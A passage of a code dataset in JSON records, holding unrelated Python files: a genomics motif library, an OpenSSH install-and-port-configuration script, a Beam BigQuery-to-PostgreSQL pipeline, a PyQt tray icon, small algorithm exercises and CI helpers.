limit)\n\n\n\nif __name__ == '__main__': # main entry point\n # https://safebooru.donmai.us/posts?page=2\n # where downloaded files are saved\n savepath = \"/media/letmesleep/LENOVO/datasets/cartoon_dataset/\"\n\n # download at most this many images\n limit = 30000\n\n goToFind(savepath, limit)\n\n print(\"total \" + str(download_pic_index) + \" pictures\")\n\n","sub_path":"datasets/data_utils/Crawlers/Pzhan.py","file_name":"Pzhan.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"508389305","text":"import sys\nimport numpy as np\nfrom itertools import zip_longest, product, chain, repeat\nimport viz_sequence\nimport train_TFmodel\nimport helper\nfrom scipy.signal import correlate2d\nfrom colour import Color\nimport matplotlib.pyplot as plt\n\none_hot_encoder = np.fromstring('acgt', np.uint8)\n\n# some sequence encoding methods\ndef encode_to_string(seq):\n \"return a string from string, uint8, or onehot\"\n if isinstance(seq, str):\n return seq\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return seq.tostring().decode('UTF-8')\n else:\n #onehot array\n indicies = np.argmax(seq, axis=1)\n return np.asarray([one_hot_encoder[i] for i in indicies]).tostring().decode('UTF-8')\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef encode_to_uint8(seq):\n \"return a uint8 from string, uint8, or onehot\"\n if isinstance(seq, str):\n return np.fromstring(seq.lower(), dtype=np.uint8)\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return seq\n else:\n #onehot array\n indicies = np.argmax(seq, axis=1)\n return np.asarray([one_hot_encoder[i] for i in indicies])\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef encode_to_onehot(seq):\n \"return a onehot from string, uint8, or onehot\"\n if isinstance(seq, str):\n return np.asarray([np.equal(char, one_hot_encoder) for char in np.fromstring(seq.lower(), dtype=np.uint8)])\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return np.asarray([np.equal(char, one_hot_encoder) for char in seq])\n else:\n #onehot array\n return seq\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef rc(seq):\n \"\"\"Takes a seq to its reverse complement of same type.\"\"\"\n onehot = encode_to_onehot(seq)\n # reverse both the position axis and the base axis of the (L, 4) one-hot array\n rc = onehot[::-1, ::-1]\n if isinstance(seq, str):\n return encode_to_string(rc)\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return encode_to_uint8(rc)\n else:\n #onehot array\n return rc\n else:\n raise TypeError('Sequence is not an accepted type')\n\nclass Sequence(object):\n \"\"\" Encoding and variations on a sequence.\n\n Attributes:\n seq -- onehot encoding of the sequence.\n \"\"\"\n \n def __init__(self, nucleotides):\n \"\"\" Create a sequence object.\n \n Arguments:\n nucleotides -- Sequence in string, 
np.uint8, or one-hot form.\n \"\"\"\n self.seq= encode_to_onehot(nucleotides) \n\n def __string__(self):\n \"\"\"ACTG representation of the sequence.\"\"\"\n return encode_to_string(self.seq)\n\n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'Sequence() length ' + str(self.seq.shape[0])\n \n def logo(self, start=None, end=None):\n \"\"\"Plot a sequence logo from start to end.\"\"\"\n viz_sequence.plot_weights(self.seq[start:end])\n\n def model_input(self):\n return self.seq\n\n def sequential_mutant_gen(self):\n \"\"\"Generate sequences with a blank mutation.\"\"\"\n for idx in range(self.seq.shape[0]):\n new_seq = np.copy(self.seq)\n new_seq[idx] = np.fromstring('x', np.uint8)\n yield new_seq\n\n def ngram_mutant_gen(self, n=1, padding='valid'):\n \"\"\" Generate ngram mutants trying every possible amino acid combination of a length n in a sequence.\n\n Keywords:\n n -- width of the motif to mutate.\n padding -- valid or same, similar to keras funcitonality.\n \"\"\"\n done = False\n if padding != 'valid':\n print('Alternative padding not yet supported')\n while not done:\n for idx in range(len(self.seq)):\n if n//2 <= idx <= len(self.seq) - n//2 - 1:\n first = idx-n//2\n last = idx+(n+1)//2 \n #standard case\n ngrams = product(one_hot_encoder, repeat=n)\n for gram in ngrams:\n new_seq = np.copy(self.seq)\n new_seq[first:last] = encode_to_onehot(np.asarray(gram))\n yield new_seq\n done = True\n\n def double_mutant_gen(self, n=1):\n \"\"\"Generate every possible double mutant.\"\"\"\n for mut1_seq in self.ngram_mutant_gen(n=n):\n for mut2_seq in Sequence(mut1_seq).ngram_mutant_gen(n=n):\n yield mut2_seq\n\n def insertion_mutant_gen(self, n=1):\n \"\"\"Generate every n length insertion.\"\"\"\n done = False\n while not done:\n for idx in range(len(self.seq)):\n ngrams = product(one_hot_encoder, repeat=n)\n for gram in ngrams:\n new_seq = np.insert(self.seq, idx, encode_to_onehot(np.asarray(gram)), axis=0)\n yield new_seq[:256]\n done = True\n\n def deletion_mutant_gen(self, n=1):\n \"\"\"Generate every deletion mutant.\"\"\"\n done = False\n while not done:\n ngrams = product(one_hot_encoder, repeat=n)\n gram = next(ngrams)\n for start_idx in range(len(self.seq)-n):\n del_idx = range(start_idx, start_idx+n)\n new_seq = np.delete(self.seq, del_idx, axis=0)\n new_seq = np.append(new_seq, encode_to_onehot(np.asarray(gram)), axis=0)\n yield new_seq\n done = True\n\n def motif_insert_gen(self, motif, mode='same'):\n \"\"\"Insert a given motif at every position.\"\"\"\n #have i track the middle of the insertion\n for i in range(self.seq.shape[0]):\n new_seq = self.seq.copy()\n if i-motif.shape[0]//2 < 0: # too early\n if mode == 'same':\n new_seq[0:i-motif.shape[0]//2 + motif.shape[0]] = motif[motif.shape[0]//2 - i:]\n yield new_seq\n elif i-motif.shape[0]//2 + motif.shape[0] > new_seq.shape[0]: # too late\n if mode == 'same':\n new_seq[i-motif.shape[0]//2:new_seq.shape[0]] = motif[:new_seq.shape[0]-i+motif.shape[0]//2]\n yield new_seq\n else: # just right\n new_seq[i-motif.shape[0]//2:i-motif.shape[0]//2 + motif.shape[0]] = motif\n yield new_seq\n\n def find_pwm(self, meme_library=None, viz=False):\n \"\"\" Convolute a meme with the sequence.\n \n Keywords:\n meme_library -- list of memes to use.\n viz -- sequence logo of importance?\n Output:\n meme -- SeqDist() of the best matching meme.\n position -- start position of the hit.\n score -- correlation score.\n \"\"\"\n if meme_library==None:\n meme_library = CTCF_memes\n # find the meme and location of the best 
match.\n score = -np.inf\n position = 0\n meme = meme_library[0]\n for test_meme in meme_library:\n corr = correlate2d(self.seq, test_meme.pwm, mode='valid')\n if np.nanmax(corr) > score:\n score = np.nanmax(corr)\n position = np.nanargmax(corr)\n meme = test_meme\n if viz:\n print('Weighted log-odds of the Sequence Distribution')\n insert = np.zeros(self.seq.shape)\n insert[position:position+meme.pwm.shape[0]] = meme.pwm\n overlap = insert * self.seq\n viz_sequence.plot_weights(overlap)\n return meme, position, score\n \n def run_pwm(self, meme=None, position=None, viz=False):\n \"\"\"Get the pwm correlation score with a sequence.\n\n Keywords:\n meme -- SeqDist() of the best matching meme, or library of memes to test.\n position -- start position of the hit.\n viz -- sequence logo of importance?\n Outputs:\n overlap -- overlap which can be summed for the score.\n \"\"\"\n if meme==None:\n # we need to find everything\n meme, position, score = self.find_pwm()\n elif position==None or isinstance(meme, list):\n # we have the meme/memelist\n meme, position, score = self.find_pwm(meme_library=meme)\n # just get the score\n insert = np.zeros(self.seq.shape)\n insert[position:position+meme.pwm.shape[0]] = meme.pwm\n overlap = insert * self.seq\n if viz:\n print('Weighted log-odds of the Sequence Distribution')\n viz_sequence.plot_weights(overlap)\n return overlap\n\nclass SeqDist(Sequence):\n \"\"\"A sequence, but as a probability distribution.\n\n Attributes:\n seq -- probability distribution of bases. \n \"\"\"\n\n def __init__(self, distribution):\n \"\"\"Create a new sequence distribution object.\"\"\"\n if isinstance(distribution, np.ndarray) and not (distribution.dtype == np.uint8):\n # right type!\n self.seq = helper.softmax(np.log(distribution)) \n else:\n raise TypeError('Sequence is not an accepted type')\n \n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'SeqDist() length ' + str(self.seq.shape[0])\n\n def logo(self, start=None, end=None):\n \"\"\"Plot a sequence logo from start to end.\"\"\"\n viz_sequence.plot_icweights(self.seq[start:end])\n\n def discrete_gen(self):\n \"\"\"Create a generator of discrete sequences.\"\"\"\n while True: \n yield self.discrete_seq()\n\n def discrete_seq(self):\n \"\"\"Return a discrete sequence sampled from the continuous distribution.\"\"\"\n discrete = [np.random.choice(one_hot_encoder, p=base) for base in self.seq]\n return encode_to_onehot(np.asarray(discrete))\n\nclass Meme(SeqDist):\n \"\"\"A position weight matrix.\n \n Attributes:\n seq -- frequency representation of the sequence.\n pwm -- log-odds representation of the motif. 
\n \"\"\"\n\n def __init__(self, dist, pwm):\n \"\"\"Create a new Meme object.\"\"\"\n self.seq = helper.softmax(np.log(dist))\n self.pwm = pwm\n\n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'Meme() length ' + str(self.seq.shape[0])\n\nclass ATACSeq(Sequence):\n \"\"\" A Sequence and matching atac counts.\"\"\"\n\n def __init__(self, nucs, atac_counts=None):\n # use 'is None' -- '== None' on an ndarray compares elementwise\n if atac_counts is None:\n super().__init__(nucs[:, 1:])\n self.atac_counts = nucs[:, 0]\n else:\n super().__init__(nucs)\n self.atac_counts = atac_counts\n\n def model_input(self):\n return np.insert(self.seq.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def sequential_mutant_gen(self):\n s = super().sequential_mutant_gen()\n for nucs in s:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def ngram_mutant_gen(self, n=1, padding='valid'):\n n = super().ngram_mutant_gen(n=n, padding=padding)\n for nucs in n:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1) \n \n def double_mutant_gen(self, n=1):\n s = super().double_mutant_gen(n)\n for nucs in s:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def logo(self, top=None, bottom=None):\n colors = list(Color(\"blue\").range_to(Color(\"white\"), 50))\n [colors.append(c) for c in (Color(\"white\").range_to(Color(\"red\"), 51))]\n if top == None:\n top = np.amax(self.atac_counts)\n if bottom == None:\n bottom = np.amin(self.atac_counts)\n \n #get highlights!\n color_weights = [int((x-bottom)/(top-bottom)*100) for x in self.atac_counts]\n highlight=dict()\n for i in range(len(self.atac_counts)):\n w = color_weights[i]\n highlight[(colors[w].rgb[0],colors[w].rgb[1], colors[w].rgb[2], .3)] = [(i, i+1)]\n #plot things out\n viz_sequence.plot_weights(self.seq, highlight=highlight)\n\n def graph(self):\n plt.figure(figsize=(20, 2))\n plt.title('ATAC counts per base')\n plt.plot(self.atac_counts)\n plt.show()\n\n\n\nclass ATACDist(SeqDist):\n \"\"\" A sequence distribution and matching atac counts.\"\"\"\n\n def __init__(self, nucs, atac_counts=None):\n # use 'is None' -- '== None' on an ndarray compares elementwise\n if atac_counts is None:\n super().__init__(nucs[:, 1:])\n self.atac_counts = nucs[:, 0]\n else:\n super().__init__(nucs)\n self.atac_counts = atac_counts\n\n def discrete_seq(self):\n return np.insert(super().discrete_seq().astype(np.float32), 0, self.atac_counts, axis=1)\n\n \ndef process_meme(meme_path, transform=False, verb=False):\n \"\"\"Extract a meme distribution and process.\n \n Arguments:\n meme_path -- file path to a .meme file.\n Keywords:\n transform -- apply normalization and a log transform or use the pre-generated log-odds matrix.\n Outputs:\n meme_list -- List of SeqDist() meme and reverse complements.\n \"\"\"\n with open(meme_path, 'r') as infile:\n meme_length = -1\n meme_dists = list()\n meme_lods = list()\n # read for the frequencies\n for line in infile.readlines():\n if 'letter-probability matrix' in line:\n meme_length = int(line.split()[5])\n if verb:\n print('found meme')\n this_meme_lines = list()\n elif meme_length > 0:\n this_meme_lines.append([float(item.strip()) for item in line.split()])\n meme_length = meme_length - 1\n elif meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_dists.append(this_meme)\n meme_length = -1\n if meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_dists.append(this_meme)\n meme_length = -1\n # add rcs of memes\n rcs = list()\n for meme in meme_dists:\n rcs.append(meme[::-1, ::-1])\n meme_dists = meme_dists + rcs\n with open(meme_path, 'r') as infile:\n # read for the pwms\n for line in infile.readlines():\n if 'log-odds matrix' in line:\n meme_length = int(line.split()[5])\n this_meme_lines = list()\n elif meme_length > 0:\n this_meme_lines.append([float(item.strip()) for item in line.split()])\n meme_length = meme_length - 1\n elif meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_lods.append(this_meme)\n meme_length = -1\n if meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_lods.append(this_meme)\n meme_length = -1\n # add rcs of memes\n rcs = list()\n for meme in meme_lods:\n rcs.append(meme[::-1, ::-1])\n meme_lods = meme_lods + rcs\n if len(meme_lods) == 0:\n # transform the memes\n if verb:\n print('using manual log-odds calculation')\n pseudocount=0.005\n for meme in meme_dists:\n # add the pseudocount so probabilities don't zero out\n meme = meme*(.98) + pseudocount\n #norms = np.repeat(np.linalg.norm(meme, axis=1), 4).reshape((-1, 4))\n meme = np.log(meme) - np.log(.25)\n meme_lods.append(meme)\n #make distribution objects\n meme_list = [Meme(distribution, log_odds) for distribution, log_odds in zip(meme_dists, meme_lods)]\n return meme_list\n\nCTCF_memes = process_meme('/home/kal/TF_models/data/memes/CTCF.meme')\nmystery_memes = process_meme('/home/kal/TF_models/data/memes/mystery_motif.meme') \n","sub_path":"bin/atacseq.py","file_name":"atacseq.py","file_ext":"py","file_size_in_byte":15928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"278945719","text":"#!/usr/bin/python3\n\nfrom subprocess import PIPE, call, Popen\nimport os, sys\nfrom time import sleep\nimport re\nimport fileinput\n\nDN = open(os.devnull, 'w')\n\nopenssh = b'^openssh-server'\n\ndef search(pkg):\n\tproc = Popen(['apt-cache', 'search', pkg],stdout=PIPE, stderr=DN)\n\n\tlistPkg = proc.communicate()[0].split(b'\\n')\n\n\tfor package in listPkg:\n\t\tif len(package) == 0:\n\t\t\tcontinue\n\t\tif (package[0]) != b' '[0]:\n\t\t\tglobal getPackage\n\t\t\tgetPackage = package[:package.find(b' ')]\n\t\t\tif re.match(pkg, getPackage, re.IGNORECASE):\n\t\t\t\tprint('Package %s available to install...' % (getPackage.decode(\"utf-8\")))\n\t\t\telse:\n\t\t\t\tprint('Package %s not available, please add another repository package...' 
% (getPackage))\n\n\treturn getPackage\n\ndef configSSH():\n\t'''\n\t\tConfigure the OpenSSH server\n\t'''\n\n\tos.system('clear')\n\tprint('Installation Process Done...')\n\tprint('Configuration OpenSSH-Server\\n')\n\tconfigFile = '/etc/ssh/sshd_config'\n\tif os.path.isfile(configFile) and os.access(configFile, os.R_OK):\n\t\t# code here\n\t\ttry:\n\t # config = open(configFile, 'r')\n\t\t\twith open(configFile, 'r') as searchconfig:\n\t\t\t\tfor port in searchconfig:\n\t\t\t\t\tif 'Port' in port:\n\t\t\t\t\t\told_port = port\n\t\t\t\t# for rootlogin in searchconfig:\n\t\t\t\t# \tif 'PermitRootLogin' in root_login:\n\t\t\t\t# \t\troot_access = root_login\n\n\t # print(root_access)\n\n\t\t\twith fileinput.FileInput(configFile, inplace=True, backup='.bak') as conf:\n\t\t\t\tnew_port = input('Set Port SSH(default Port 22): ')\n\t\t\t\tdefault = '22'\n\n\t\t\t\tfor configPort in conf:\n\t\t\t\t\t\tif not new_port:\n\t\t\t\t\t\t\tprint(configPort.replace(old_port, ('Port %s\\n' % default)), end=\"\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(configPort.replace(old_port, ('Port %s\\n' % new_port)), end=\"\")\n\t\t\tconf.close()\n\t\texcept IOError:\n\t\t\tprint('Something went wrong')\n\t# else:\n\t# \treturn search(openssh)\n\nif __name__ == '__main__':\n\ttry:\n\t\tif not os.geteuid() == 0:\n\t\t\texit('Please run as r00t...\\n')\n\n\t\t# checkPkg(openssh)\n\n\t\tsearch(openssh)\n\n\t\tchar = re.sub(b'[\\\\^]', b'', openssh)\n\t\tif getPackage == char:\n\t\t\tdoInstall = call(['apt-get', 'install', getPackage], stderr=DN)\n\t\t\tconfigSSH()\n\t\t\tprint('Configuration Success...')\n\t\t\t# print(getPackage.decode(\"utf-8\"))\n\texcept SyntaxError as error:\n\t\tprint('Something went wrong during execution')\n","sub_path":"openssh.py","file_name":"openssh.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"236914203","text":"def insere_atividade():\r\n n = input('Enter the number of activities to register: ')\r\n\r\n # atividade = {'titulo': 't', 'materia': 'm', 'pontuação': 'p', 'data': 'd' }\r\n i = int(n)\r\n lista = list()\r\n while i > 0:\r\n lista.append({'título': input('Enter the activity title: '), 'materia': input('Enter the subject: '),\r\n 'pontuacao': int(input('Enter the score: ')), 'data': input('Enter the due date: ')})\r\n i -= 1\r\n lista_ordenada = sorted(lista, key=lambda k: k['pontuacao'], reverse=True)\r\n with open('Lista_atividades', 'a+') as file:\r\n for n in range(len(lista_ordenada)):\r\n file.writelines(str(lista_ordenada[n]).split(sep=',{'))\r\n file.write('\\n')\r\n#file.writelines(str(lista_ordenada).split(sep=',{'))\r\n return lista_ordenada\r\n\r\n\r\ndef deleta_atividade(lista):\r\n n = input('Enter the positions, separated by spaces, of the activities to delete from the list: ')\r\n leng = n.split()\r\n t = len(leng)\r\n i = t\r\n while i > 0:\r\n i -= 1\r\n del (lista[int(leng[i])])\r\n\r\n with open('Lista_atividades', 'w+') as file:\r\n for n in range(len(lista)):\r\n if str(lista[n]) != '\\n':\r\n file.writelines(str(lista[n]).split(sep=',{'))\r\n# file.write('\\n')\r\n\r\n\r\ndef imprime_atividade():\r\n file = open('Lista_atividades')\r\n print(file.read())\r\n\r\n\r\n\r\np = True\r\nwhile p is True:\r\n arquivo = open('Lista_atividades')\r\n lista_univ = arquivo.readlines()\r\n c = input(\r\n 'Choose an option:\\n[1] - Insert activity\\n[2] - Delete activity\\n[3] - Print task '\r\n 'list\\n[4] - Exit\\n')\r\n if int(c) == 1:\r\n lista_univ = insere_atividade()\r\n if int(c) == 2:\r\n deleta_atividade(lista_univ)\r\n if int(c) == 3:\r\n imprime_atividade()\r\n if int(c) == 4:\r\n p = False\r\n","sub_path":"Lista_1_Q2.py","file_name":"Lista_1_Q2.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"494540368","text":"# 696. Count Binary Substrings\n# Given a string s, count the number of non-empty (contiguous) substrings that have the same number of 0's and 1's, and all the 0's and all the 1's in these substrings are grouped consecutively.\n# Substrings that occur multiple times are counted the number of times they occur.\n# Example 1:\n# Input: \"00110011\"\n# Output: 6\n# Explanation: There are 6 substrings that have equal number of consecutive 1's and 0's: \"0011\", \"01\", \"1100\", \"10\", \"0011\", and \"01\".\n# Notice that some of these substrings repeat and are counted the number of times they occur.\n# Also, \"00110011\" is not a valid substring because all the 0's (and 1's) are not grouped together.\n# Example 2:\n# Input: \"10101\"\n# Output: 4\n# Explanation: There are 4 substrings: \"10\", \"01\", \"10\", \"01\" that have equal number of consecutive 1's and 0's.\n# Note:\n# s.length will be between 1 and 50,000.\n# s will only consist of \"0\" or \"1\" characters.\n\n\nclass Solution:\n # My first approach: split the binary string into runs, grouping consecutive 0s or consecutive 1s together, and store them in a list (only the run lengths are needed).\n # Traverse that list and, for each pair of adjacent elements, add the smaller one to the total to get the result.\n # This approach effectively traverses the array twice and can be improved.\n def countBinarySubstrings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n i, l, count = 0, len(s), 0\n ls = []\n while i < l:\n j = i + 1\n # There is actually no need to test against '0'; checking s[j] == s[i] would be enough\n if s[i] == '0':\n while j < l and s[j] == '0':\n j += 1\n else:\n while j < l and s[j] == '1':\n j += 1\n ls.append(j - i)\n i = j\n i = 1\n while i < len(ls):\n count += min(ls[i], ls[i - 1])\n i += 1\n return count\n\n # Try to compute the result in a single pass over the string.\n def method2(self, s):\n i = count = 0\n l = len(s)\n a, b = -1, 0\n while i < l:\n j = i + 1\n while j < l and s[j] == s[i]:\n j += 1\n if a == -1:\n a = j - i\n else:\n b = j - i\n count += min(a, b)\n a = b\n i = j\n return count\n\n\nif __name__ == '__main__':\n s = Solution()\n s_ = '01010100011'\n print(s.countBinarySubstrings(s_))\n print(s.method2(s_))\n","sub_path":"python/Leetcode/count_binary_string.py","file_name":"count_binary_string.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"49670243","text":"from PyQt5 import QtWidgets,QtGui,QtCore\nimport sys\nclass M_tray(QtWidgets.QSystemTrayIcon):\n def __init__(self,aa):\n super(M_tray, self).__init__(aa)\n self.setIcon(QtGui.QIcon(\"Res/Tray.ico\"))\n # icoclicked runs when the tray icon is clicked\n self.activated.connect(self.icoclicked)\n self.icon = self.MessageIcon()\n self.showmenu()\n def showmenu(self):\n pw=self.parent()\n self.mainmenu=QtWidgets.QMenu()\n self.mainAction = QtWidgets.QAction(\"Show Main Window\", self, triggered=pw.show)\n self.settinAction = QtWidgets.QAction(\"Settings\", self, triggered=pw.aa.show)\n self.quitAction = QtWidgets.QAction(\"Quit\", self, triggered=self.quit)\n self.mainmenu.addAction(self.mainAction)\n self.mainmenu.addAction(self.settinAction)\n self.mainmenu.addAction(self.quitAction)\n self.setContextMenu(self.mainmenu)\n def icoclicked(self,reason):\n pw=self.parent()\n if reason==2:\n if pw.isVisible():\n pw.hide()\n else:\n pw.show()\n def 
quit(self):\n self.setVisible(False)\n # note the difference between close(), quit(), and exit()\n self.parent().close()\n sys.exit()\n","sub_path":"Models/M_tray.py","file_name":"M_tray.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"306284843","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\n\nMade to run with directrunner and a local PostgreSQL database in docker.\n\nReads data from BQ, writes to two tables in PostgreSQL.\n\nexample based on https://github.com/apache/beam/blob/master/sdks/python/apache_beam/examples/cookbook/bigquery_tornadoes.py\n\npython bq-postgres.py --temp_location gs://PROJECT_ID-test --project PROJECT_ID\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom beam_nuggets.io import relational_db\nfrom sqlalchemy import Table, Integer, String, Column\n\nimport datetime\n\nimport argparse\nimport logging\n\nimport apache_beam as beam\n\n\ndef count_categories(input_data):\n \"\"\"Count input rows per category, keying each count with a timestamp suffix.\"\"\"\n ts = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n return (\n input_data\n | 'count ' >> beam.FlatMap(\n lambda row: [(int(row['category']),1)])\n | 'count inputs' >> beam.CombinePerKey(sum)\n | 'formatoutput' >>\n beam.Map(lambda k_v: {\n 'category_ts': str(k_v[0])+ts, 'count': k_v[1]\n }))\n\n\ndef run(argv=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n default='PROJECT_ID:demos.small_teams',\n help=(\n 'Input BigQuery table to process specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output',\n# required=True,\n required=False,\n help=(\n 'Output BigQuery table for results specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n\n parser.add_argument(\n '--gcs_location',\n required=False,\n help=('GCS Location to store files to load '\n 'data into Bigquery'))\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n source_config = relational_db.SourceConfiguration(\n drivername='postgresql+pg8000',\n host='localhost',\n port=5432,\n username='postgres',\n password='pwd',\n database='postgres'\n\n )\n\n\n table_config_teams = relational_db.TableConfiguration(\n name='teams',\n create_if_missing=True, # automatically create the table if not there\n primary_key_columns=['id'] # and use 'id' column as primary key\n )\n\n table_config_category = relational_db.TableConfiguration(\n name='category',\n create_if_missing=True, # automatically create the table if not there\n primary_key_columns=['category_ts'] # and use 'category_ts' column as primary key\n )\n\n with beam.Pipeline(argv=pipeline_args) as p:\n # Read the table rows into a PCollection.\n rows = p | 'read' >> beam.io.ReadFromBigQuery(\n query=\"\"\"\n SELECT id, category FROM 
`PROJECT_ID.demos.small_teams` limit 1500\"\"\",\n use_standard_sql=True)\n counted= count_categories(rows)\n\n\n # Write the output using a \"Write\" transform that has side effects.\n\n rows | 'Write Teams' >> relational_db.Write(\n source_config=source_config,\n table_config=table_config_teams )\n counted | 'Write Counts' >> relational_db.Write(\n source_config=source_config,\n table_config=table_config_category )\n\n # Run the pipeline (all operations are deferred until run() is called).\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"bq-postgres.py","file_name":"bq-postgres.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"341184521","text":"import os\nimport sys\nimport requests\n\nSERVER_URL = \"https://gitlab.kwant-project.org\"\nPROJECT_ID = 334\nJOB_NAME = \"build singularity image\"\nIMAGE_PATH = \"build/Singularity.simg\"\nTARGET_FILENAME = \"/etc/singularity_url\"\n\ntry:\n token = os.environ[\"GITLAB_API_TOKEN\"]\n pipeline_id = os.environ[\"CI_PIPELINE_ID\"]\nexcept KeyError as ex:\n print(f\"{ex.args[0]} is undefined, not resolving the Singularity container\",\n file=sys.stderr)\n sys.exit(0)\n\nreq = requests.get(f\"{SERVER_URL}/api/v4/projects/{PROJECT_ID}/pipelines/{pipeline_id}/jobs\",\n headers={\"PRIVATE-TOKEN\": token})\n\nfor job in reversed(req.json()):\n if job[\"name\"] == JOB_NAME:\n with open(TARGET_FILENAME, \"w\") as f:\n print(f\"{SERVER_URL}/api/v4/projects/{PROJECT_ID}/jobs/{job['id']}/artifacts/{IMAGE_PATH}\", file=f)\n sys.exit(0)\n\nprint(f\"Job \\\"{JOB_NAME}\\\" is not found in the CI job\", file=sys.stderr)\nsys.exit(250)\n","sub_path":"main_image/resolve_singularity.py","file_name":"resolve_singularity.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468077459","text":"# -*- coding: utf-8 -*-\n\"\"\"HTTP exception object.\"\"\"\n\nfrom .http import HTTP_STATUS_CODES\n\n\nclass HTTPException(Exception):\n\n \"\"\"This can be raised from middleware to render an error page.\"\"\"\n\n def __init__(self, code=None, message=None, exception=None):\n if not isinstance(code, int) or code not in HTTP_STATUS_CODES:\n code = 500\n if message is None:\n message = HTTP_STATUS_CODES[code]\n super(HTTPException, self).__init__(message)\n self.status_code = code\n self.message = message\n self.exception = exception\n","sub_path":"malt/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385227581","text":"def plusOne1(digits):\n return [int(i) for i in str(int(\"\".join([str(i) for i in digits]))+1)]\n\ndef plusOne2(digits):\n s = \"\".join([str(i) for i in digits])\n leftzeros = len(s) - len(str(int(s)))\n return [0]*leftzeros + [int(i) for i in str(int(s)+1)]\n\ndef plusOne(digits):\n if digits[-1] != 9:\n digits[-1] += 1\n else:\n i=-1\n while -i <= len(digits) and (digits[i] == 9):\n digits[i] = 0\n i -= 1\n if i+1 == -len(digits):\n digits = [1] + digits\n else:\n digits[i] += 1\n return digits\n\nlst = [9,9]\nprint(plusOne1(lst))","sub_path":"20201114.py","file_name":"20201114.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8683873","text":"from functions import functionObj, 
rosenbrock\nfrom models.optimizers import GoldenSectionSearch\n\nf_x = lambda x: x**2 - 4*x + 4\nf_x_obj = functionObj(f_x)\n\nopt = GoldenSectionSearch(f_x_obj, xtol = 1e-6, maxIter=2e10)\n\nx_min, _ = opt._line_search()\nprint('X: %.9f \\nF_x: %.9f'%(x_min, f_x_obj(x_min)))\nprint('Function evals: %d'%(f_x_obj.fevals - 1))\n","sub_path":"tests/testGR.py","file_name":"testGR.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
